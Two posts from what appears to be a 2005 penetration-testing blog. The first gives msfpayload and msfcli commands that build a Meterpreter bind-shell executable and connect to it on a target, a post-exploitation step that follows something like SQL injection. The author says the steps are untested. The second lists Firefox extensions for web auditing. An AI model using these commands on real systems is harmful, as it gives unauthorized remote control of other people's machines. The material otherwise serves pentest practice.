Wednesday, October 26, 2005

Using Meterpreter as a standalone utility

Post-exploitation techniques are a cool topic, these days i read a thread in Metasploit Mailing list
about using Meterpreter payload as a standalone utility, for example after exploiting sql injection you can upload meterpreter and work through it. Well here is some fast example on how to achieve this.

To create the meterpreter server:

$ msfpayload win32_bind_meterpreter LPORT=4321 X > met.exe

Copy this executable to the target system and find some way to execute it.

After executing it, you can use the "payload_handler" exploit to connect
and interact with it:
$ msfcli payload_handler PAYLOAD=win32_bind_meterpreter LPORT=4321 RHOST= E

I haven't time to test it but i think it works.

This is great for windows, if the target system is a Unix you could rely on S.E.L.F (Shellcode Elf Loader, another focus for the same objective "post-exploitation", i recommend to take a look at S.E.L.F. Phrack article.

Sunday, October 2, 2005

Mozilla Firefox extensions for the pentester

Here i will list some of the most useful extensions for doing applications audits or pentest using Mozilla Firefox:


* Letting you edit request headers and replay an URL. Look for the Replay button in the live window! Very useful ;)

Web Developer Tools:
* Excellent tool, that let you do a lot of things, a must have. It turns the browser into a complete development Tool.

Switch Proxy Tools:
* This extension allows you to define a list of proxies and switch on the fly with a button, very fast! Tor, Paros, Burp, webscarab, jap.

Tamper Data:
* Use tamperdata to view and modify HTTP/HTTPS headers and post parameters. Trace and time http response/requests.

* A front end for httrack, you could create website mirrors from the browser.

* Slogger creates a complete log of your browsing history. It can save every page using the same options as the "Save Page As" command as well as saving a customizable plain text history file

Add n Edit Cookies:
*Cookie Editor that allows you add and edit "session" and saved cookies.

If you got another interesting plugin, please share ;)